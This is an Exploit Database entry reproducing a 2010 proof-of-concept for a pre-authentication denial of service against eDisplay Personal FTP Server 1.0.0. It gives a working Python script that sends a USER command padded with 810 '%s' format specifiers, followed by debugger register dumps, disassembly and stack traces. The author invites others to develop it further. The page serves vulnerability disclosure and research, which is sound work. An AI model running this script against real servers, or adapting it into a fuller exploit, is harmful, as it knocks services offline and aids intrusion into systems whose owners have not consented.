eDisplay Personal FTP Server 1.0.0 – Denial of Service (PoC)

• Exploit Database
• 8 阅读

• 作者： loneferret
  日期： 2010-03-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11809/

• # Title: eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS (PoC)
  # From: The eh?-Team || The Great White Fuzz (we're not sure yet)
  # Found by: loneferret
  # Hat's off to dookie2000ca
  # Disvovery date: 16/03/2010
  # Software link: http://edisplay-personal-ftp-server.software.informer.com/
  # Tested on: Windows XP SP3 Professional
  # Nod to the Exploit-DB Team
  
  # Vendor informed via email : 17/03/2010
  
  #!/usr/bin/python
  
  #Pre-Authentication crash #1
  #I say crash number 1 since there's another instance where it crashes with the USER command.
  #Also many post-authentication commands also crash with the same buffer type (%n for example)
  #with variant degrees of interesting CPU registry overwrites.
  #It will crash if you send it about 40 '%s' really, but I've included my full session of 810 bytes sent.
  #As always, if anyone wants to take this further go right ahead. Just be nice and don't forget who found it.
  
  #CONTEXT DUMP
  # EIP: 7e4287aa mov dl,[eax]
  # EAX: 73736150 (1936941392) -> N/A
  # EBX: 0000000a ( 10) -> N/A
  # ECX: 73736150 (1936941392) -> N/A
  # EDX: 00000000 ( 0) -> N/A
  # EDI: 0012c9a6 ( 1231270) -> P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack)
  # ESI: 73736151 (1936941393) -> N/A
  # EBP: 0012c8e4 ( 1231076) -> P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, 
  #	 and whether this process is started automatically 
  #	 or under programmatic control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack)
  # ESP: 0012c89c ( 1231004) -> 9HwC(J :^:{P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, and whether this process is started automatically or under programmatic (stack)
  # +00: 0139b8d0 ( 20560080) -> PWSOCK32.DLL (heap)
  # +04: 77124880 (1997686912) -> N/A
  # +08: 000000cd ( 205) -> N/A
  # +0c: 00000000 ( 0) -> N/A
  # +10: ffffffff (4294967295) -> N/A
  # +14: 00000000 ( 0) -> N/A
  
  #disasm around:
  #	0x7e428794 push eax
  #	0x7e428795 push byte 0x0
  #	0x7e428797 push esi
  #	0x7e428798 lea eax,[ebp+0x8]
  #	0x7e42879b push eax
  #	0x7e42879c call [0x7e4114b8]
  #	0x7e4287a2 jmp 0x7e428747
  #	0x7e4287a4 test eax,eax
  #	0x7e4287a6 jz 0x7e42875e
  #	0x7e4287a8 jmp 0x7e428747
  #	0x7e4287aa mov dl,[eax]
  #	0x7e4287ac inc eax
  #	0x7e4287ad test dl,dl
  #	0x7e4287af jnz 0x7e4287aa
  #	0x7e4287b1 sub eax,esi
  #	0x7e4287b3 xor esi,esi
  #	0x7e4287b5 xor edx,edx
  #	0x7e4287b7 cmp [ebp-0x28],edx
  #	0x7e4287ba jnl 0x7e443411
  #	0x7e4287c0 sub [ebp-0x18],eax
  #	0x7e4287c3 cmp esi,edx
  
  #stack unwind:
  #	FtpServX.dll:50e0989b
  #	FtpServX.dll:50e0a6d8
  #	FtpServX.dll:50e09d91
  #	USER32.dll:7e418734
  #	USER32.dll:7e418816
  #	USER32.dll:7e4189cd
  #	USER32.dll:7e4196c7
  #	MSVBVM60.DLL:7342a6b0
  #	MSVBVM60.DLL:7342a627
  #	MSVBVM60.DLL:7342a505
  
  #SEH unwind:
  #	0012fdf8 -> FtpServX.dll:50e1ceb4 mov eax,0x50e1fcf8
  #	0012fe58 -> USER32.dll:7e44048f push ebp
  #	0012ffa8 -> USER32.dll:7e44048f push ebp
  #	0012ffe0 -> MSVBVM60.DLL:7350bafd push ebp
  #	ffffffff -> kernel32.dll:7c839ac0 push ebp
  
  
  import socket
  
  buffer = ("%s") * 810	# \x25\x73
  
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  connect=s.connect(('xxx.xxx.xxx.xxx',21))
  s.recv(1024)
  s.send('USER '+buffer+'\r\n')
  s.recv(1024)